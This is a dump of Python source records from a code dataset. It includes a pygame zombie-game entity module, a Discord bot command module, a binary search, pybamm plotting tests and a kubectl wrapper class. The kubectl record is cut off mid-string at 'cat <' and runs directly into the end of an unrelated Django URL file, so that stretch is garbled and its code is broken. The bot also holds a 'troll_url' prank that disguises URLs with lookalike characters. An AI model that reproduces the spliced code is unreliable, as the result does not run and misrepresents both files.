enumerate(self.down_blocks, 2):\n # x = block(x)\n # if i == (self.depth - 1):\n # continue\n # pre_pools[\"layer_\"+str(i)] = x\n\n # x = self.bridge(x)\n\n # for i, block in enumerate(self.up_blocks, 1):\n # k = self.depth - 1 - i\n # key = \"layer_\"+str(k)\n # x = block(x, pre_pools[key])\n # output_feature_map = x\n # depth_gen = self.out(x)\n # del pre_pools\n\n # dis_input = torch.cat((x2,depth_gen),0)\n\n # dis = self.discriminator_blocks(dis_input).squeeze()\n # # dis = dis.view(-1, 6*6*512)\n # # dis = self.discriminate(dis).squeeze()\n\n # if with_output_feature_map:\n # return dis, depth_gen, output_feature_map\n # else:\n # return dis, depth_gen\n\n else:\n return \"wrong_mode!\"","sub_path":"Object Recognition/RGBD Object Recogntion/depth_gen.py","file_name":"depth_gen.py","file_ext":"py","file_size_in_byte":13825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11869616","text":"# The deal_cards function deals a specified numberr of cards from the deck\r\n\r\ndef deal_cards(deck, number):\r\n # Initialize an accumulator for the hand value.\r\n hand_value = 0\r\n\r\n # Make sure the number of cards to deal is not geater tham the number of cards in the deck.\r\n if number > len(deck):\r\n number = len(deck)\r\n\r\n # Deal the cards and accumulate their values\r\n for count in range(number):\r\n card, value = deck.popitem()\r\n print(card)\r\n hand_value += value\r\n\r\n #Display the value of the hand.\r\n print('Value of this hand:', hand_value)\r\n\r\n# Call the main function\r\nmain()","sub_path":"card_dealer deal_cards fumction.py","file_name":"card_dealer deal_cards fumction.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311049731","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# serveur.py\r\n#\r\n# Copyright 2019 Aurélien Bück-Kaeffer\r\n#\r\n#\r\n\"\"\"\r\nCote serveur\r\nS'execute pour gerer les entites\r\n\"\"\"\r\n\r\n__author__ = [ 'Aurélien Bück-Kaeffer' ]\r\n__mail__ = 'aurelien.buck.kaeffer@gmail.com'\r\n__version__ = '0.0.1'\r\n\r\nimport pygame\r\nfrom math import atan, sqrt\r\nimport time\r\n\r\nclass objet: #Classe mere regroupant fonctions et caracteristiques communes des classes heritieres\r\n\tdef __init__ (self, type, pos, image, hitbox, health, num, angle = 0):\r\n\t\tself.type = type\r\n\t\tself.pos = { 'x' : pos[ 'x' ], 'y' : pos[ 'y' ] }\r\n\t\tself.image = image\r\n\t\tself.hitbox = hitbox\r\n\t\tself.health = health\r\n\t\tself.num = num\r\n\t\tself.angle = angle\r\n\t\r\n\tdef set_type ( self, type ):\r\n\t\t\"\"\"definis la nature de l'objet\"\"\"\r\n\t\tself.type = type\r\n\t\r\n\tdef get_type ( self ):\r\n\t\t\"\"\"renvoi la nature de l'objet\"\"\"\r\n\t\treturn self.type\r\n\t\r\n\tdef set_pos ( self, pos ):\r\n\t\t\"\"\"definis la position de l'objet\"\"\"\r\n\t\tself.pos = { 'x' : pos[ 'x' ], 'y' : pos[ 'y' ] }\r\n\t\t\r\n\tdef get_pos ( self ):\r\n\t\t\"\"\"renvoie les coordonnes de l'objet\"\"\"\r\n\t\treturn self.pos\r\n\r\n\tdef set_image ( self, image ):\r\n\t\t\"\"\"definis le sprite de l'objet\"\"\"\r\n\t\tself.image = image\r\n\r\n\tdef get_image ( self ):\r\n\t\t\"\"\"renvoi le sprite de l'objet\"\"\"\r\n\t\treturn self.image\r\n\t\r\n\tdef set_hitbox ( self, hitbox ):\r\n\t\t\"\"\"definis la hitbox de l'objet\"\"\"\r\n\t\tself.hitbox = hitbox\r\n\t\t\r\n\tdef get_hitbox ( self ):\r\n\t\t\"\"\"renvoi la hitbox de l'objet\"\"\"\r\n\t\treturn self.hitbox\r\n\t\r\n\tdef set_health( self, health ):\r\n\t\t\"\"\"definis la vie de l'objet\"\"\"\r\n\t\tself.health = health\r\n\t\r\n\tdef get_health( self ):\r\n\t\t\"\"\"renvoi la vie de l'objet\"\"\"\r\n\t\treturn self.health\r\n\t\r\n\tdef set_num( self, num ):\r\n\t\t\"\"\"definis la pos de l'objet\"\"\"\r\n\t\tself.num = num\r\n\t\r\n\tdef get_num( self ):\r\n\t\t\"\"\"renvoi la pos de l'objet\"\"\"\r\n\t\treturn self.num\r\n\t\r\n\tdef set_angle( self, angle ):\r\n\t\t\"\"\"definis l'angle de l'objet\"\"\"\r\n\t\tself.angle = angle\r\n\t\r\n\tdef get_angle( self ):\r\n\t\t\"\"\"renvoi l'angle de l'objet\"\"\"\r\n\t\treturn self.angle\r\n\r\nclass player(objet):\r\n\tdef __init__ (self, pseudo, type, pos, image, vitesse, hitbox, health, num, SCREEN_SIZE, v_up = 0, v_side = 0, KO = False, score = 0):\r\n\t\tobjet.__init__(self, type, pos, image, hitbox, health, num)\r\n\t\tself.pseudo = pseudo\r\n\t\tself.vitesse = vitesse\r\n\t\tself.v_up = v_up\r\n\t\tself.v_side = v_side\r\n\t\tself.SCREEN_SIZE = SCREEN_SIZE\r\n\t\tself.KO = KO\r\n\t\tself.score = 0\r\n \r\n\tdef set_pseudo ( self, pseudo ):\r\n\t\t\"\"\"definis le pseudo du joueur\"\"\"\r\n\t\tself.pseudo = pseudo\r\n\t\r\n\tdef get_pseudo ( self ):\r\n\t\t\"\"\"renvoi le pseudo du joueur\"\"\"\r\n\t\treturn self.pseudo\r\n\t\r\n\tdef set_vitesse( self, vitesse ):\r\n\t\t\"\"\"definis la vitesse du joueur\"\"\"\r\n\t\tself.vitesse = vitesse\r\n\t\t\r\n\tdef get_vitesse ( self ):\r\n\t\t\"\"\"renvoi la vitesse du joueur\"\"\"\r\n\t\treturn self.vitesse\r\n\t\r\n\tdef set_SCREEN_SIZE( self, SCREEN_SIZE ):\r\n\t\t\"\"\"definis la taille de l'ecran du joueur\"\"\"\r\n\t\tself.SCREEN_SIZE = SCREEN_SIZE\r\n\t\r\n\tdef get_SCREEN_SIZE( self ):\r\n\t\t\"\"\"renvoi la taille de l'ecran du joueur\"\"\"\r\n\t\treturn self.SCREEN_SIZE\r\n\t\r\n\tdef set_KO( self, time ):\r\n\t\t\"\"\"definis l'etat du joueur\"\"\"\r\n\t\tself.KO = time\r\n\t\r\n\tdef get_KO( self ):\r\n\t\t\"\"\"renvoi le moment ou il a ete mis KO si le joueur est KO, False sinon\"\"\"\r\n\t\treturn self.KO\r\n\t\r\n\tdef set_score( self, score ):\r\n\t\t\"\"\"definis le score\"\"\"\r\n\t\tself.score = score\r\n\t\r\n\tdef get_score( self ):\r\n\t\t\"\"\"renvoi le score\"\"\"\r\n\t\treturn self.score\r\n\t\r\n\tdef damage( self, damage ):\r\n\t\t\"\"\"diminue la vie du joueur de la valeur entrée\"\"\"\r\n\t\tself.health -= damage\r\n\t\tif self.health <= 0:\r\n\t\t\tself.set_KO( time.time() )\r\n\t\t\tself.set_image( 'player_dead' )\r\n\t\t\r\n\tdef mouv ( self, k_up, k_left, k_down, k_right, list_collidable):\r\n\t\t\"\"\"fonction de la classe Joueur\r\n\t\ts'occupe des déplacements\"\"\"\r\n\t\tpos = self.get_pos()\r\n\t\t# haut\r\n\t\tif k_up == \"True\":\r\n\t\t\tif self.v_up > -1 * self.vitesse:\r\n\t\t\t\tself.v_up -= self.vitesse/20\r\n\t\telse:\r\n\t\t\tif self.v_up < 0:\r\n\t\t\t\tself.v_up += self.vitesse/40\r\n\t\t\t\r\n # gauche\r\n\t\tif k_left == \"True\":\r\n\t\t\tif self.v_side > -1 * self.vitesse:\r\n\t\t\t\tself.v_side -= self.vitesse/20\r\n\t\telse:\r\n\t\t\tif self.v_side < 0:\r\n\t\t\t\tself.v_side += self.vitesse/40\r\n\t\t\t\r\n # bas\r\n\t\tif k_down == \"True\":\r\n\t\t\tif self.v_up < self.vitesse:\r\n\t\t\t\tself.v_up += self.vitesse/20\r\n\t\telse:\r\n\t\t\tif self.v_up > 0:\r\n\t\t\t\tself.v_up -= self.vitesse/40\r\n\t\t\t\r\n # droite\r\n\t\tif k_right == \"True\":\r\n\t\t\tif self.v_side < self.vitesse:\r\n\t\t\t\tself.v_side += self.vitesse/20\r\n\t\telse:\r\n\t\t\tif self.v_side > 0:\r\n\t\t\t\tself.v_side -= self.vitesse/40\r\n\t\t\r\n\t\tcollision_x = False\r\n\t\tcollision_y = False\r\n\t\t#Test de colision de la position future X pour determiner si le deplacement est autorise\r\n\t\tfutur_pos_x = self.hitbox.move( round(self.v_side), 0 ) \r\n\t\tfor a in range( 0, len( list_collidable ) ):\r\n\t\t\t\tif futur_pos_x.colliderect( list_collidable[a].get_hitbox() ):#Test des collisions avec les zombies\r\n\t\t\t\t\tcollision_x = True\r\n\t\t\t\t\tself.v_side = 0\r\n\t\t\r\n\t\tif collision_x == False:#Deplacement si il n'y a pas collision\r\n\t\t\tself.set_pos( { 'x' : self.pos[ 'x' ] + round(self.v_side), 'y' : self.pos[ 'y' ] } )\r\n\t\t\tself.hitbox = self.hitbox.move( round(self.v_side), 0 )\r\n\t\t\t\r\n\t\t#Test de colision de la position future Y pour determiner si le deplacement est autorise\r\n\t\tfutur_pos_y = self.hitbox.move( 0, round(self.v_up) )\r\n\t\tfor a in range( 0, len( list_collidable ) ):\r\n\t\t\t\tif futur_pos_y.colliderect( list_collidable[a].get_hitbox() ):#Test des collisions avec les zombies\r\n\t\t\t\t\tcollision_y = True\r\n\t\t\t\t\tself.v_up = 0\r\n\t\t\r\n\t\tif collision_y == False:#Deplacement si il n'y a pas collision\r\n\t\t\tself.set_pos( { 'x' : self.pos[ 'x' ], 'y' : self.pos[ 'y' ] + round(self.v_up) } )\r\n\t\t\tself.hitbox = self.hitbox.move( 0, round(self.v_up) )\r\n\t\t\r\n\tdef tir ( self, liste_zombies, pos_souris, weapon, liste_walls, size_ent ):\r\n\t\t\"\"\"fonction de la classe joueur\r\n\t\ts'occupe des tirs\"\"\"\r\n\t\t\r\n\t\tif weapon == 'gun':\r\n\t\t\tportee = 1000\r\n\t\telse:\r\n\t\t\tportee = 0\r\n\t\t\r\n\t\thitbox = pygame.Rect( self.pos[ 'x' ] + size_ent[ 'x' ]/2 , self.pos[ 'y' ] + size_ent[ 'y' ]/2 , 1, 1 )\r\n\t\t\r\n\t\ttouche = False\r\n\t\t\r\n\t\ttrajectoire = [0, 1]\r\n\t\t\r\n\t\tdistance = ( ( pos_souris[ 0 ] - self.pos[ 'x' ] )**2 + ( pos_souris[ 1 ] - self.pos[ 'y' ] )**2 )**0.5\r\n\t\ttrajectoire[0] = ( pos_souris[ 0 ] - ( round(self.get_SCREEN_SIZE()[ 'x' ]/2 + size_ent[ 'x' ]/2 ) ) ) / distance\r\n\t\ttrajectoire[1] = ( pos_souris[ 1 ] - ( round(self.get_SCREEN_SIZE()[ 'y' ]/2 + size_ent[ 'y' ]/2 ) ) ) / distance\r\n\t\t\r\n\t\ttrajX = self.pos[ 'x' ]\r\n\t\ttrajY = self.pos[ 'y' ]\r\n\t\t\r\n\t\twhile touche == False:\r\n\t\t\ttrajX += trajectoire[0]*30\r\n\t\t\ttrajY += trajectoire[1]*30\r\n\t\t\thitbox = hitbox.move( round(trajX-hitbox.x), round(trajY-hitbox.y) )\r\n\t\t\t\r\n\t\t\tif ( ( hitbox.x - self.pos[ 'x' ] )**2 + ( hitbox.y - self.pos[ 'y' ] )**2 )**0.5 > portee :\r\n\t\t\t\ttouche = True\r\n\t\t\thit = []\r\n\t\t\tfor x in range( 0, len( liste_zombies ) ):\r\n\t\t\t\tif hitbox.colliderect( liste_zombies[x].get_hitbox() ):\r\n\t\t\t\t\thit.append([x, 'zombies'])\r\n\t\t\t\t\ttouche = True\r\n\t\t\tfor x in range( 0, len( liste_walls ) ):\r\n\t\t\t\tif hitbox.colliderect( liste_walls[x].get_hitbox() ) and liste_walls[x].get_solide():\r\n\t\t\t\t\thit.append([x, 'terrain'])\r\n\t\t\t\t\ttouche = True\r\n\t\tdata = [ weapon, { 'x' : round( self.get_pos()[ 'x' ] + size_ent[ 'x' ]/2 ) , 'y' : round( self.get_pos()[ 'y' ] + size_ent[ 'y' ]/2 ) }, { 'x' : hitbox.x, 'y' : hitbox.y }, hit ]\r\n\t\tself.v_side -= trajectoire[0]*0.5 #recul\r\n\t\tself.v_up -= trajectoire[1]*0.5\r\n\t\treturn data\r\n\r\n\r\n\r\nclass zombies(objet):\r\n\tdef __init__ ( self, type, pos, image, vitesse, hitbox, health, num, trigger_range, v_up = 0, v_side = 0 ):\r\n\t\tobjet.__init__(self, type, pos, image, hitbox, health, num)\r\n\t\tself.vitesse = vitesse\r\n\t\tself.v_up = v_up\r\n\t\tself.v_side = v_side\r\n\t\tself.trigger_range = trigger_range\r\n\t\r\n\tdef set_vitesse( self, vitesse ):\r\n\t\t\"\"\"definis la vitesse de l'objet\"\"\"\r\n\t\tself.vitesse = vitesse\r\n\t\t\r\n\tdef get_vitesse ( self ):\r\n\t\t\"\"\"renvoi la vitesse de l'objet\"\"\"\r\n\t\treturn self.vitesse\r\n\t\t\r\n\t\r\n\tdef set_trigger_range( self, trigger_range ):\r\n\t\t\"\"\"definis la distance de reperage de l'objet\"\"\"\r\n\t\tself.trigger_range = trigger_range\r\n\t\t\r\n\tdef get_trigger_range( self ):\r\n\t\t\"\"\"renvoi la distance de reperage de l'objet\"\"\"\r\n\t\treturn self.trigger_range\r\n\t\r\n\tdef mouv ( self, list_player, list_collidable ):\r\n\t\t\"\"\"deplacement du zombie\"\"\"\r\n\t\tif len(list_player) != 0:\r\n\t\t\tplayer_pos = list_player[0].get_pos()\r\n\t\telse:\r\n\t\t\tplayer_pos = self.pos\r\n\t\tfor x in range( 0, len(list_player) ):\r\n\t\t\ta = list_player[x].get_pos()[ 'y' ]\r\n\t\t\tif abs( ( list_player[x].get_pos()[ 'x' ] - self.pos[ 'x' ] )**2 + ( list_player[x].get_pos()[ 'y' ] - self.pos[ 'y' ] )**2 ) < abs( ( player_pos[ 'x' ] - self.pos[ 'x' ] )**2 + ( player_pos[ 'y' ] - self.pos[ 'y' ] )**2 ): #test pour determiner le joueur le plus proche\r\n\t\t\t\tplayer_pos = list_player[x].get_pos()\r\n\t\t\r\n\t\tif abs( ( player_pos[ 'x' ] - self.pos[ 'x' ] )**2 + ( player_pos[ 'y' ] - self.pos[ 'y' ] )**2 ) < self.trigger_range**2:\r\n\t\t\t\t\r\n\t\t\tif player_pos[ 'x' ] < self.pos[ 'x' ]: #si le joueur est sur la gauche\r\n\t\t\t\tif self.v_side > -1 * self.vitesse/100 * self.health:\r\n\t\t\t\t\tself.v_side -= self.vitesse/20\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.v_side = -1 * self.vitesse/100 * self.health\r\n\t\t\telse:\r\n\t\t\t\tif self.v_side < 0: #sinon ralentis progressivement\r\n\t\t\t\t\tself.v_side += self.vitesse/40\r\n\t\t\t\r\n\t\t\tif player_pos[ 'x' ] > self.pos[ 'x' ]:#si le joueur est sur la droite\r\n\t\t\t\tif self.v_side < self.vitesse/100 * self.health:\r\n\t\t\t\t\tself.v_side += self.vitesse/20\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.v_side = self.vitesse/100 * self.health\r\n\t\t\telse:\r\n\t\t\t\tif self.v_side > 0:#sinon ralentis progressivement\r\n\t\t\t\t\tself.v_side -= self.vitesse/40\r\n\t\t\t\r\n\t\t\tif player_pos[ 'y' ] < self.pos[ 'y' ]:#si le joueur est au dessus\r\n\t\t\t\tif self.v_up > -1 * self.vitesse/100 * self.health:\r\n\t\t\t\t\tself.v_up -= self.vitesse/20\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.v_up = -1 * self.vitesse/100 * self.health\r\n\t\t\telse:\r\n\t\t\t\tif self.v_up < 0:#sinon ralentis progressivement\r\n\t\t\t\t\tself.v_up += self.vitesse/40\r\n\t\t\t\r\n\t\t\tif player_pos[ 'y' ] > self.pos[ 'y' ]:#si le joueur est au dessous\r\n\t\t\t\tif self.v_up < self.vitesse/100 * self.health:\r\n\t\t\t\t\tself.v_up += self.vitesse/20\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.v_up = self.vitesse/100 * self.health\r\n\t\t\telse:\r\n\t\t\t\tif self.v_up > 0:#sinon ralentis progressivement\r\n\t\t\t\t\tself.v_up -= self.vitesse/40\r\n\t\t\t\r\n\t\t\tcollision_x = False\r\n\t\t\tcollision_y = False\r\n\t\t\t#Test de colision de la position future X pour determiner si le deplacement est autorise\r\n\t\t\tfutur_pos_x = self.hitbox.move( round(self.v_side), 0 )\r\n\t\t\tfor a in range( 0, len( list_collidable ) ):\r\n\t\t\t\tif futur_pos_x.colliderect( list_collidable[a].get_hitbox() ):#Test des collisions avec les zombies\r\n\t\t\t\t\tcollision_x = True\r\n\t\t\t\t\tself.v_side = 0\r\n\t\t\t\t\tif list_collidable[a].get_image() == 'player':\r\n\t\t\t\t\t\tlist_collidable[a].damage( 150 )\r\n\t\t\t\t\t\r\n\t\t\tif collision_x == False:#Deplacement si il n'y a pas collision\r\n\t\t\t\tself.set_pos( { 'x' : self.pos[ 'x' ] + round(self.v_side), 'y' : self.pos[ 'y' ] } )\r\n\t\t\t\tself.hitbox = self.hitbox.move( round(self.v_side), 0 )\r\n\t\t\t\r\n\t\t\t#Test de colision de la position future Y pour determiner si le deplacement est autorise\r\n\t\t\tfutur_pos_y = self.hitbox.move( 0, round(self.v_up) )\r\n\t\t\tfor a in range( 0, len( list_collidable ) ):\r\n\t\t\t\tif futur_pos_y.colliderect( list_collidable[a].get_hitbox() ):#Test des collisions avec les zombies\r\n\t\t\t\t\tcollision_y = True\r\n\t\t\t\t\tself.v_up = 0\r\n\t\t\t\t\tif list_collidable[a].get_image() == 'player':\r\n\t\t\t\t\t\tlist_collidable[a].damage( 50 )\r\n\t\t\t\r\n\t\t\tif collision_y == False:#Deplacement si il n'y a pas collision\r\n\t\t\t\tself.set_pos( { 'x' : self.pos[ 'x' ], 'y' : self.pos[ 'y' ] + round(self.v_up) } )\r\n\t\t\t\tself.hitbox = self.hitbox.move( 0, round(self.v_up) )\r\n\tdef orientation( self ):\r\n\t\t\"\"\"orientation du zombie en fonction de sa vitesse x et y\"\"\"\r\n\t\t\r\n\t\tif round(self.v_side) == 0:\r\n\t\t\tif self.v_up > 0.5:\r\n\t\t\t\tself.set_angle( 90 )\r\n\t\t\telif self.v_up < -0.5 :\r\n\t\t\t\tself.set_angle( 270 )\r\n\t\t\r\n\t\telse:\r\n\t\t\tself.set_angle( -1 * atan( round(self.v_up)/round(self.v_side) ) * 50 )\r\n\r\n\t\t\tif self.v_side > 0:\r\n\t\t\t\tself.set_angle( self.get_angle() - 180 )\r\n\r\nclass terrain( objet ):\r\n\tdef __init__( self, type, pos, taille, image, hitbox, health, num, solide ):\r\n\t\tobjet.__init__(self, type, pos, image, hitbox, health, num)\r\n\t\tself.solide = solide\r\n\t\tself.taille = taille\r\n\tdef set_solide( self, solide ):\r\n\t\t\"\"\"definis si l'objet est solide ou non\"\"\"\r\n\t\tself.solide = solide\r\n\tdef get_solide( self ):\r\n\t\t\"\"\"renvoi True si l'objet est solide et False si il ne l'est pas\"\"\"\r\n\t\treturn self.solide\r\n\tdef set_taille ( self, taille ):\r\n\t\t\"\"\"definis la taille de l'objet\"\"\"\r\n\t\tself.taille = { 'x' : taille[ 'x' ], 'y' : taille[ 'y' ] }\r\n\r\n\tdef get_taille ( self ):\r\n\t\t\"\"\"renvoi la taille de l'objet\"\"\"\r\n\t\treturn self.taille\r\n\tdef get_visible( self, pos_player, liste_opaque ):\r\n\t\tprint(liste_opaque)\r\n\t\thitbox = pygame.Rect( self.pos[ 'x' ] + self.taille[ 'x' ]/2 , self.pos[ 'y' ] + self.taille[ 'y' ]/2 , 1, 1 )\r\n\t\t\r\n\t\tvisible = False\r\n\t\ttouche = False\r\n\t\t\r\n\t\ttrajectoire = [0, 1]\r\n\t\t\r\n\t\tdistance = ( ( pos_player[ 'x' ] - self.pos[ 'x' ] )**2 + ( pos_player[ 'y' ] - self.pos[ 'y' ] )**2 )**0.5\r\n\t\tif distance < 1000:\r\n\t\t\ttrajectoire[0] = ( pos_player[ 'x' ] + self.get_taille()[ 'x' ]/2 ) / distance\r\n\t\t\ttrajectoire[1] = ( pos_player[ 'y' ] + self.get_taille()[ 'y' ]/2 ) / distance\r\n\t\t\t\r\n\t\t\ttrajX = self.pos[ 'x' ]\r\n\t\t\ttrajY = self.pos[ 'y' ]\r\n\t\t\t\r\n\t\t\twhile not touche:\r\n\t\t\t\ttrajX += trajectoire[0]*20\r\n\t\t\t\ttrajY += trajectoire[1]*20\r\n\t\t\t\thitbox = hitbox.move( round(trajX-hitbox.x), round(trajY-hitbox.y) )\r\n\t\t\t\t\r\n\t\t\t\tif ( ( hitbox.x - self.pos[ 'x' ] )**2 + ( hitbox.y - self.pos[ 'y' ] )**2 )**0.5 > distance :\r\n\t\t\t\t\ttouche = True\r\n\t\t\t\t\tprint(1)\r\n\t\t\t\thit = []\r\n\t\t\t\tfor x in range( 0, len( liste_opaque ) ):\r\n\t\t\t\t\tif hitbox.colliderect( liste_opaque[x].get_hitbox() ):\r\n\t\t\t\t\t\tvisible = True\r\n\t\t\t\t\t\ttouche = True\r\n\t\t\t\t\t\tprint(2)\r\n\t\treturn visible\r\n\r\nclass spawner( objet ):\r\n\tdef __init__( self, type, pos, taille, image, hitbox, health, num, solide ):\r\n\t\tobjet.__init__(self, type, pos, image, hitbox, health, num)\r\n\t\tself.taille = taille\r\n\tdef set_taille ( self, taille ):\r\n\t\t\"\"\"definis la taille de l'objet\"\"\"\r\n\t\tself.taille = { 'x' : taille[ 'x' ], 'y' : taille[ 'y' ] }\r\n\r\n\tdef get_taille ( self ):\r\n\t\t\"\"\"renvoi la taille de l'objet\"\"\"\r\n\t\treturn self.taille\r\n\tdef spawn_( self, list_zombies, list_player ):\r\n\t\tusable = True\r\n\t\tfor x in range(0, len(list_zombies) ):\r\n\t\t\tif self.hitbox.colliderect( list_zombies[x].get_hitbox() ):\r\n\t\t\t\tusable = False\r\n\t\tfor x in range(0, len(list_player) ):\r\n\t\t\tif sqrt(( list_player[x].get_pos()[ 'x' ] - self.pos[ 'x' ] )**2 + ( list_player[x].get_pos()[ 'y' ] - self.pos[ 'y' ] )**2 ) > 1500:\r\n\t\t\t\tusable = False\r\n\t\treturn usable\r\n","sub_path":"version lycée/entites.py","file_name":"entites.py","file_ext":"py","file_size_in_byte":14648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339312883","text":"import subprocess\n\n\nclass K8s(object):\n\n def __init__(self, server, token, namespace, opts):\n self.base_cmd = 'kubectl --server={server} --token={token}' \\\n ' -n {namespace} {opts} '.format(server=server,\n token=token,\n namespace=namespace,\n opts=opts)\n\n def apply(self, template):\n apply_command = 'cat </edit/', ReviewUpdateView.as_view(), name='edit_review'\n ),\n ##### VIEWS FOR STAFF USER ONLY #####\n # listview for all reviews, button to publish/reject\n path('staff-review/', StaffReviewListView.as_view(), name='staff_reviews')\n]\n","sub_path":"reviews/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528928485","text":"import random\nimport requests\nimport asyncio\nimport bot.cakebot_config as cakebot_config\n\nfrom bot.modules.ModuleInterface import ModuleInterface\nfrom bot.modules.helpers import is_integer\nfrom bot.modules.misc import misc_help, misc_consts\n\n\nclass MiscModule(ModuleInterface):\n async def timed_cats(self, message):\n async def inner(m):\n times, duration_str = MiscModule._parse_duration_str(m.content.split())\n unit_time = misc_consts.time_map[duration_str][0]\n\n unit = misc_consts.time_map[duration_str][1]\n unit_plural = misc_consts.time_map[duration_str][2]\n\n if times == 1:\n unit_plural = unit\n\n await self.say(\n m.channel,\n \"Sending cats every {} for {} {}!\".format(unit, times, unit_plural),\n )\n\n for i in range(times):\n cat_url = requests.get(\"http://aws.random.cat/meow\").json()[\"file\"]\n await self.say(m.channel, cat_url)\n if i == times - 1:\n await self.say(m.channel, \"Finished sending cats!\")\n break\n await asyncio.sleep(unit_time)\n\n await self.auth_function(inner)(message, owner_auth=True)\n\n async def troll_url(self, message):\n await self.say(\n message.channel, MiscModule._return_troll(message.content.split()[1])\n )\n await self.delete(message)\n\n async def invite(self, message):\n await self.say(\n message.channel,\n \"Add me to your server! Click here: {}\".format(\n cakebot_config.NORMAL_INVITE_LINK\n ),\n )\n\n async def gen_google_link(self, message):\n url = \"https://www.google.com/#q=\" + \"+\".join(message.content.split()[1:])\n await self.say(message.channel, url)\n\n @staticmethod\n def _parse_duration_str(args):\n # Used for !timedcats. May be extended for use with other commands in the future.\n # Returns a tuple (times, duration_str)\n # Defaults to 5 m if no duration string is given\n times = 5\n duration_str = \"m\"\n\n if len(args) > 1:\n arg_times = args[1]\n if is_integer(arg_times):\n if int(arg_times) <= 60:\n times = int(arg_times)\n\n if len(args) > 2:\n arg_duration = args[2]\n if arg_duration in misc_consts.time_map:\n duration_str = arg_duration\n return times, duration_str\n\n @staticmethod\n def _select_repl(char):\n try:\n weight = 8\n key = int(random.random() * (len(misc_consts.repl_dict[char]) + weight))\n if key < weight + 1:\n return misc_consts.repl_dict[char][\n 0\n ] # Below weight, key equals 0 (key for first/default character)\n else:\n return misc_consts.repl_dict[char][key - weight]\n except KeyError: # Return original char if char not found in dict\n return char\n\n @staticmethod\n def _return_troll(url):\n prefix = \"\"\n if \"https://\" in url:\n prefix = \"https://\"\n elif \"http://\" in url:\n prefix = \"http://\"\n return prefix + \"\".join(\n [MiscModule._select_repl(x) for x in url[len(prefix) :]]\n )\n\n command_handlers = {\n \"!timedcats\": timed_cats,\n \"!trollurl\": troll_url,\n \"!invite\": invite,\n \"!google\": gen_google_link,\n }\n\n help_entries = misc_help.help_entries\n","sub_path":"bot/modules/misc/MiscModule.py","file_name":"MiscModule.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"272499212","text":"from random import randint\n\n\ndef binary_search(array, key_value, left=0, right=None):\n if right is None:\n right = len(array)\n\n middle = (left + right) // 2\n while array[middle] != key_value and left <= right:\n if array[middle] < key_value:\n left = middle+1\n else:\n right = middle-1\n\n middle = (left + right) // 2\n\n return (True, middle) if not (left > right) else (False, middle+1)\n\n\nlst = [randint(10, 50) for _ in range(25)]\nprint(lst)\n\nlst.sort()\nprint(lst)\n\nkey = int(input('please enter key: '))\nflag, idx = binary_search(lst, key)\nprint('Flag:', flag)\nprint('Index:', idx)\n\nif flag:\n print('Yes, index =', idx)\nelse:\n print('No')\n lst.insert(idx, key)\n print(lst)\n\n","sub_path":"Lesson_10/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39585927","text":"import pybamm\nimport unittest\nimport numpy as np\n\n\nclass TestQuickPlot(unittest.TestCase):\n def test_simple_ode_model(self):\n model = pybamm.SimpleODEModel()\n geometry = model.default_geometry\n param = model.default_parameter_values\n param.process_model(model)\n param.process_geometry(geometry)\n mesh = pybamm.Mesh(geometry, model.default_submesh_types, model.default_var_pts)\n disc = pybamm.Discretisation(mesh, model.default_spatial_methods)\n disc.process_model(model)\n solver = model.default_solver\n t_eval = np.linspace(0, 2, 100)\n solution = solver.solve(model, t_eval)\n quick_plot = pybamm.QuickPlot(model, mesh, solution)\n quick_plot.plot(0)\n\n # update the axis\n new_axis = [0, 0.5, 0, 1]\n quick_plot.axis.update({(\"a\",): new_axis})\n self.assertEqual(quick_plot.axis[(\"a\",)], new_axis)\n\n # and now reset them\n quick_plot.reset_axis()\n self.assertNotEqual(quick_plot.axis[(\"a\",)], new_axis)\n\n # check dynamic plot loads\n quick_plot.dynamic_plot(testing=True)\n\n quick_plot.update(0.01)\n\n # Test with different output variables\n quick_plot = pybamm.QuickPlot(model, mesh, solution, [\"b broadcasted\"])\n self.assertEqual(len(quick_plot.axis), 1)\n quick_plot.plot(0)\n\n quick_plot = pybamm.QuickPlot(\n model,\n mesh,\n solution,\n [[\"a\", \"a\"], [\"b broadcasted\", \"b broadcasted\"], \"c broadcasted\"],\n )\n self.assertEqual(len(quick_plot.axis), 3)\n quick_plot.plot(0)\n\n # update the axis\n new_axis = [0, 0.5, 0, 1]\n var_key = (\"c broadcasted\",)\n quick_plot.axis.update({var_key: new_axis})\n self.assertEqual(quick_plot.axis[var_key], new_axis)\n\n # and now reset them\n quick_plot.reset_axis()\n self.assertNotEqual(quick_plot.axis[var_key], new_axis)\n\n # check dynamic plot loads\n quick_plot.dynamic_plot(testing=True)\n\n quick_plot.update(0.01)\n\n # Test longer name\n model.variables[\"Variable with a very long name\"] = model.variables[\"a\"]\n quick_plot = pybamm.QuickPlot(model, mesh, solution)\n quick_plot.plot(0)\n\n # Test errors\n with self.assertRaisesRegex(ValueError, \"mismatching variable domains\"):\n pybamm.QuickPlot(model, mesh, solution, [[\"a\", \"b broadcasted\"]])\n model.variables[\"3D variable\"] = disc.process_symbol(\n pybamm.Broadcast(1, [\"negative particle\"])\n )\n with self.assertRaisesRegex(NotImplementedError, \"cannot plot 3D variables\"):\n pybamm.QuickPlot(model, mesh, solution, [\"3D variable\"])\n\n def test_loqs_spm_base(self):\n t_eval = np.linspace(0, 0.01, 2)\n\n # SPM\n options = {\"thermal\": None}\n for model in [pybamm.lithium_ion.SPM(options), pybamm.lead_acid.LOQS()]:\n geometry = model.default_geometry\n param = model.default_parameter_values\n param.process_model(model)\n param.process_geometry(geometry)\n mesh = 